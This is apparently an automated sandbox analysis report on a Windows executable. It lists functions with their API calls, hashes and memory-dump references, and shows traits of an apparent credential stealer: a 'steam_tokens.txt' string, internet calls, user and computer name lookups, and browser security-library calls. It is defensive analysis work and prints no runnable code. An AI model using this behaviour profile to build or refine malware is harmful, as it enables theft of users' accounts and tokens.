VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 56c56d0ac979ecf528fa834ab5668d8e9f1c3a748c19addad7c8f0e0189fc1c2
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 56c56d0ac979ecf528fa834ab5668d8e9f1c3a748c19addad7c8f0e0189fc1c2
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04280410,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042805E0), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 4e1426bb6e453fa2bd72c8d833ae83fcb907f802ceb5109f219a0bd248af3bc1
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: 4e1426bb6e453fa2bd72c8d833ae83fcb907f802ceb5109f219a0bd248af3bc1
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042805E0), ref: 00404ED9

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 5f162bfc1c44642f331e0c0873274716a90d4d7b27288750754e5bccf06d92a1
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: 5f162bfc1c44642f331e0c0873274716a90d4d7b27288750754e5bccf06d92a1
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042805E0), ref: 00404ED9

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 0dfc0c37dacf53687937091f8bd0d6cb5841a5d0fe5245e0e276d37ed571f88f
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: 0dfc0c37dacf53687937091f8bd0d6cb5841a5d0fe5245e0e276d37ed571f88f
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042805E0), ref: 00404ED9

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 723e3975c86366f4a9ee359e3a7af14c6eb07fec96e5ff6531a2812f506249fd
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 723e3975c86366f4a9ee359e3a7af14c6eb07fec96e5ff6531a2812f506249fd
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,04285CA0), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 25099304a87c3d11f92d54e3c281556fafb66eef98d33469309e03ea3a8d58f8
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: 25099304a87c3d11f92d54e3c281556fafb66eef98d33469309e03ea3a8d58f8
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 924ea5fc5d28cb21faf5fcb26490c24c064cdc032b6e7dd3b81b2cd1a6f9f7b9
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: 924ea5fc5d28cb21faf5fcb26490c24c064cdc032b6e7dd3b81b2cd1a6f9f7b9
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04280330,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00415530 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: d5c28e0c1c7e45756f81669eafe0f10d1f2d27191eaad386d3d0ade1da73dce0
Instruction ID: 5f6283e4cb308baa7d4615cf810ff09d37e65c2d0c188b0d2e4390bfcb6d80e5
Opcode Fuzzy Hash: d5c28e0c1c7e45756f81669eafe0f10d1f2d27191eaad386d3d0ade1da73dce0
Instruction Fuzzy Hash: 4701E834904508FFCF04CF98C585BEC7BB2AF44308F648089D9056B395D3789A84DB49

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 68D94840 Relevance: 65.1, APIs: 29, Strings: 8, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,68D7601B,?,00000000,?), ref: 68D9486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 68D948A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 68D948BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 68D948DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 68D948F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 68D9490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 68D94919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 68D9493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 68D94970
PORT_Alloc_Util.NSS3(00000001), ref: 68D949A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 68D949AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 68D949D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 68D949F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 68D94A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 68D94A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 68D94A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 68D94A4F
PL_strcasecmp.NSS3(00000000,every), ref: 68D94A6C
